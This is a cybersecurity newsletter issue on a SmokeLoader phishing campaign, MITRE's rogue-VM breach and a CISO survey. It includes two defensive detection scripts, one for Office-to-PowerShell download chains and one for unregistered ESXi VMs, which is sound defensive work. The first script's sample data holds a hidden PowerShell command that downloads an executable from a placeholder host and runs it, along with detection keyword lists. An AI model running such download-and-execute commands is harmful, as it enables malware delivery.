May 30 2024
Welcome to Gone Phishing, your daily cybersecurity newsletter that always brings the hottest cyber stories.
Today's hottest cybersecurity news stories:
Be afraid, says CERT-UA of UAC-0006's malware campaign
MITRE attack: Rogue VMs allowed hackers to evade detection
Human error is still the proverbial Achilles heel of cybersecurity
The Computer Emergency Response Team of Ukraine (CERT-UA) has issued a warning about a significant increase in cyberattacks linked to the financially-motivated threat actor UAC-0006.
Threat Actor Overview
Group: UAC-0006
Active Since: At least 2013
Primary Targets: Accountants' PCs used for financial activities, including remote banking systems.
Main Activities: Stealing credentials and making unauthorised fund transfers.
Recent Campaigns
Start Date: May 20, 2024
Campaigns: At least two major campaigns distributing SmokeLoader malware via email.
Tactics:
Emails with ZIP archives containing IMG files, which hide EXE malware and ACCDB documents.
Weaponized Microsoft Access files that execute malicious macros.
PowerShell commands used to download and run EXE files.
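The delivery chain above (Access file, macro, PowerShell download, EXE execution) leaves a distinctive parent/child process trail on the endpoint. The following is an added example of detection logic for that trail, not CERT-UA's or the newsletter's code; the records are constructed in the shape of Sysmon process-creation events (ParentImage, Image, CommandLine) and every path and URL is a placeholder.

```python
"""Flag script hosts spawned by Microsoft Office that fetch and run content.

Added example, not CERT-UA's or the newsletter's code. SAMPLE_EVENTS are
constructed Sysmon-style process-creation records; all paths are placeholders.
"""
import re

OFFICE_PARENTS = ("msaccess.exe", "winword.exe", "excel.exe", "powerpnt.exe")
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe")

# Command-line fragments that fetch content from the network.
DOWNLOAD_PATTERNS = [
    r"downloadfile", r"downloadstring", r"invoke-webrequest", r"\biwr\b",
    r"net\.webclient", r"start-bitstransfer", r"\bcurl\b", r"\bwget\b",
]
# Fragments that run what was fetched, or hide the window while doing so.
EXECUTE_PATTERNS = [
    r"start-process", r"invoke-expression", r"\biex\b", r"-encodedcommand",
    r"\s-e(nc)?\s", r"-w(indowstyle)?\s+hidden", r"\s-nop\b", r"bypass",
]


def _basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> dict:
    """Return {'severity': 'high'|'medium'|'none', 'indicators': [...]}."""
    indicators = []
    parent = _basename(event.get("ParentImage", ""))
    image = _basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "").lower()

    if parent in OFFICE_PARENTS:
        indicators.append(f"office-parent:{parent}")
    if image in SCRIPT_HOSTS:
        indicators.append(f"script-host:{image}")
    if any(re.search(p, cmd) for p in DOWNLOAD_PATTERNS):
        indicators.append("download")
    if any(re.search(p, cmd) for p in EXECUTE_PATTERNS):
        indicators.append("execute-or-evade")

    office_child = parent in OFFICE_PARENTS and image in SCRIPT_HOSTS
    if office_child and "download" in indicators:
        severity = "high"      # macro -> script host -> network fetch
    elif office_child:
        severity = "medium"    # Office spawning a script host is unusual on its own
    else:
        severity = "none"
    return {"severity": severity, "indicators": indicators}


def triage(events):
    """Return (verdict, event) pairs worth an analyst's time, highest severity first."""
    order = {"high": 0, "medium": 1}
    ranked = [(classify(e), e) for e in events]
    return sorted(
        ((v, e) for v, e in ranked if v["severity"] != "none"),
        key=lambda pair: order[pair[0]["severity"]],
    )


# Constructed sample events (placeholders, not real telemetry).
SAMPLE_EVENTS = [
    {   # the chain from the campaign description: Access macro -> PowerShell -> download -> run EXE
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\MSACCESS.EXE",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": ("powershell.exe -w hidden -c \"(New-Object Net.WebClient)"
                        ".DownloadFile('http://example.invalid/a.exe','C:\\Users\\Public\\a.exe');"
                        " Start-Process C:\\Users\\Public\\a.exe\""),
    },
    {   # benign admin script launched from a normal shell
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -File C:\scripts\nightly-backup.ps1",
    },
    {   # Office spawning cmd with no network activity: suspicious, lower confidence
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\MSACCESS.EXE",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"cmd.exe /c dir C:\Users\Public",
    },
]

if __name__ == "__main__":
    for verdict, event in triage(SAMPLE_EVENTS):
        print(verdict["severity"], verdict["indicators"], event["CommandLine"][:60])
```

The parent/child pairing is what carries the signal: a download cradle on its own is noisy in environments where administrators script deployments, but Microsoft Access (or any Office application) launching PowerShell that reaches out to the network is rare enough to page on. Obfuscated or encoded command lines will defeat the keyword list, which is why the medium tier keeps the bare Office-to-script-host relationship visible even when no keyword matches.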
Malware Involved
SmokeLoader: Acts as a loader for other malware. Injects malicious code into the explorer process and downloads additional payloads.
TALESHOT and RMS: Downloaded after the initial infection to further compromise the system.
Botnet Operations
Size: Several hundred infected machines.
Potential Actions: CERT-UA suspects imminent fraudulent activities involving remote banking systems.
CERT-UA Recommendations
Target Audience: Ukrainian CEOs and IT departments.
Recommendations:
Enhance cybersecurity measures for accountantsโ automated workplaces.
Implement proper security policies and protection mechanisms.
Monitor for indicators of compromise provided by CERT-UA.
Historical Context
Previous Warnings: In May 2023, CERT-UA alerted about a phishing campaign using SmokeLoader in the form of a polyglot file.
Financial Impact: UAC-0006 has attempted to steal tens of millions of hryvnias through mass online theft campaigns between August and October 2023.
Further Reading
CERT-UA has published detailed articles on UAC-0006's tactics, techniques, and procedures (TTPs) to help organisations better understand and defend against this persistent threat.
Conclusion
The recent surge in cyberattacks by UAC-0006 targeting Ukraine's financial sector underscores the critical need for robust cybersecurity measures. Organisations, particularly those involved in financial operations, must stay vigilant and implement comprehensive security protocols to safeguard against these sophisticated attacks.
Spending hours gathering evidence, tracking risk, and answering security questionnaires? Move away from manual work by automating key GRC program needs with Vanta.
Automate evidence collection across 21+ frameworks including SOC 2 and ISO 27001 with continuous monitoring
Centralize risk and report on program impact to internal teams
Create your own Trust Center to proactively manage buyer needs
Leverage AI to answer security questionnaires faster
Join Vanta's webinar on June 11 to learn more about scaling your GRC program with automation and AI.
The MITRE Corporation has released new details about a significant cyberattack that occurred in December 2023. This breach was disclosed in April 2024, revealing that a China-linked nation-state actor, UNC5221, infiltrated MITRE's systems by exploiting two Ivanti Connect Secure zero-day vulnerabilities.
Timeline and Initial Response
Date of Breach: January 2024
Discovery: The security team detected unauthorised activities and promptly took mitigation steps, including taking the affected Networked Experimentation, Research, and Virtualization Environment (NERVE) offline.
Action Taken: Third-party forensics and internal experts were engaged for a thorough investigation. Authorities and affected parties were notified, and operational alternatives for collaboration were initiated.
Modus Operandi
Exploitation Method: Threat actors leveraged Ivanti Connect Secure vulnerabilities to gain access.
Infiltration: Attackers created rogue virtual machines (VMs) within MITRE's VMware environment using compromised vCenter Server access.
Tools and Techniques:
Deployed a JSP web shell (BEEFLUSH) under the vCenter Server's Tomcat server.
Used a Python-based tunnelling tool to facilitate SSH connections between rogue VMs and the ESXi hypervisor infrastructure.
Advanced Tactics
Evasion: By creating rogue VMs, the adversaries evaded detection from centralised management interfaces like vCenter, maintaining control over compromised systems.
Persistence: On January 7, 2024, they deployed malicious payloads, including the BRICKSTORM backdoor and the BEEFLUSH web shell, ensuring persistent access and arbitrary command execution.
Techniques: Manipulated SSH and scripts to control compromised systems.
Exploited the default VMware account (VPXUSER) to list drives, create new VMs, and execute payloads.
Used SFTP to write files and /bin/vmx to execute them, remaining invisible to standard management interfaces.
Subsequent Payloads
Additional malicious payloads such as WIREFIRE (aka GIFTEDVISITOR) and BUSHWALK web shells were deployed for data exfiltration.
Mitigation and Recommendations
Scripts Released:
Invoke-HiddenVMQuery: A PowerShell script to detect malicious activities by scanning for anomalous invocations of the /bin/vmx binary.
VirtualGHOST: Another tool to help identify and mitigate threats within the VMware environment.
Key Points:
Simply using hypervisor management interfaces is insufficient for dealing with rogue VMs.
Special tools and techniques are required to effectively identify and manage rogue VMs, which operate outside standard security policies.
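The key point above is that a VM launched straight from /bin/vmx with a config file outside the registered inventory never shows up in vCenter, so the hypervisor itself has to be asked what it is running and the answer compared with what the management layer believes. The following is an added example of that reconciliation, not MITRE's Invoke-HiddenVMQuery or the VirtualGHOST tool; the two command outputs are constructed samples in the shape of `vim-cmd vmsvc/getallvms` and a `ps -c` listing filtered to vmx worlds, and the datastore and VM names are placeholders.

```python
"""Reconcile running vmx processes on an ESXi host against the registered VM inventory.

Added example, not MITRE's or CrowdStrike's code. REGISTERED_OUTPUT and
PROCESS_OUTPUT are constructed samples; names and paths are placeholders.
"""
import re

# Constructed: registered inventory as the host reports it (getallvms-style).
REGISTERED_OUTPUT = """\
Vmid   Name     File                              Guest OS                Version
1      web-01   [datastore1] web-01/web-01.vmx    ubuntu64Guest           vmx-19
2      db-01    [datastore1] db-01/db-01.vmx      windows2019srv_64Guest  vmx-19
"""

# Constructed: running vmx worlds on the same host (ps-style). The third entry
# is a VM started directly from /bin/vmx with a config file in a dot-directory.
PROCESS_OUTPUT = """\
2101234  2101234  vmx  /bin/vmx -s sched.group=host/user /vmfs/volumes/datastore1/web-01/web-01.vmx
2101300  2101300  vmx  /bin/vmx -s sched.group=host/user /vmfs/volumes/datastore1/db-01/db-01.vmx
2109876  2109876  vmx  /bin/vmx -x /vmfs/volumes/datastore1/.hidden/jump.vmx
"""

REGISTERED_RE = re.compile(r"\[(?P<ds>[^\]]+)\]\s+(?P<path>\S+\.vmx)")
PROCESS_RE = re.compile(r"/bin/vmx\b.*?(?P<cfg>/vmfs/volumes/\S+\.vmx)")


def registered_configs(getallvms_output: str) -> set:
    """Map '[datastore] dir/vm.vmx' entries to their /vmfs/volumes paths.

    Assumption: the datastore label matches its /vmfs/volumes directory name.
    On a real host, resolve the datastore UUID symlink before comparing.
    """
    configs = set()
    for line in getallvms_output.splitlines():
        m = REGISTERED_RE.search(line)
        if m:
            configs.add(f"/vmfs/volumes/{m['ds']}/{m['path']}")
    return configs


def running_configs(ps_output: str) -> dict:
    """Map each running vmx config path to the world ID running it."""
    running = {}
    for line in ps_output.splitlines():
        m = PROCESS_RE.search(line)
        if m:
            running[m["cfg"]] = line.split()[0]
    return running


def find_unregistered_vmx(getallvms_output: str, ps_output: str) -> list:
    """Return running vmx processes whose config file is not in the inventory."""
    known = registered_configs(getallvms_output)
    return [
        {"world_id": wid, "config": cfg}
        for cfg, wid in running_configs(ps_output).items()
        if cfg not in known
    ]


if __name__ == "__main__":
    for hit in find_unregistered_vmx(REGISTERED_OUTPUT, PROCESS_OUTPUT):
        print(f"unregistered VM: world {hit['world_id']} running {hit['config']}")
```

Run this per host, not per vCenter: the whole point of the technique is that the management layer's inventory is the thing being bypassed, so the process list has to come from the hypervisor (over SSH or an out-of-band console) and the comparison has to include every host in the cluster. A second pass comparing the host-level inventory against vCenter's catches the complementary case of a VM registered on a host but hidden from the central view.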
Conclusion and Call to Action
MITRE emphasises the need for vigilance and adaptability in defending against evolving cyber threats. By understanding and countering new adversary behaviours, organisations can bolster their defences and safeguard critical assets from future intrusions.
Takeaway
Stay Updated: Regularly update systems and follow vendor recommendations.
Vigilance: Continuously monitor for anomalous activities and potential threats.
Proactive Defence: Implement robust security measures, including the use of specialised tools for detecting rogue VMs.
By enhancing awareness and implementing proactive security strategies, organisations can better protect themselves from sophisticated cyberattacks.
According to Proofpoint's 2024 Voice of the CISO report, while fears of cyberattacks continue to rise, Chief Information Security Officers (CISOs) are demonstrating increasing confidence in their ability to defend against these threats.
Key Findings
Rising Confidence: 70% of CISOs feel at risk of a material cyberattack in the next 12 months, up from 68% in 2023 and 48% in 2022. However, only 43% feel unprepared for a targeted attack, a significant drop from 61% in 2023 and 50% in 2022.
Human Error: Human error remains the most significant vulnerability, with 74% of CISOs identifying it as a major concern. Despite this, 86% believe employees understand their role in protecting the organisation.
AI Solutions: 87% of CISOs are looking to deploy AI-powered capabilities to mitigate human-centric risks and advanced threats.
Top Threats: The biggest perceived threats in 2024 are ransomware (41%), malware (38%), and email fraud (36%).
Generative AI Risks: 54% of CISOs believe generative AI poses a security risk, with tools like ChatGPT, collaboration platforms, and Microsoft 365 seen as top concerns.
Strategic Shifts
Increased Investment: There is a notable increase in data loss prevention (DLP) technology and employee education on data security best practices.
Board Alignment: 84% of CISOs report that their board members align with them on cybersecurity issues, up from 62% in 2023.
CISO Burnout: Burnout among CISOs has decreased slightly, but 66% still feel excessive expectations, and 72% would not join an organisation without Directors & Officers (D&O) insurance.
Challenges and Adaptations
Economic Impact: 59% of CISOs report that the economic downturn has hampered their ability to make critical investments, with many facing budget cuts and staff reductions.
Proactive Measures: CISOs are increasingly focused on strategic defences, including enhanced education and technological adoption, to counter evolving threats.
Conclusion
Ryan Kalember, Chief Strategy Officer at Proofpoint, emphasises the need for vigilance and adaptation in the face of ongoing challenges. The report underscores a shift towards greater resilience and preparedness among CISOs globally.
Extra, Extra! Read all about it!
Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!
Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday.
Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders.
Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future.
Let us know what you think.
So long and thanks for reading all the phish!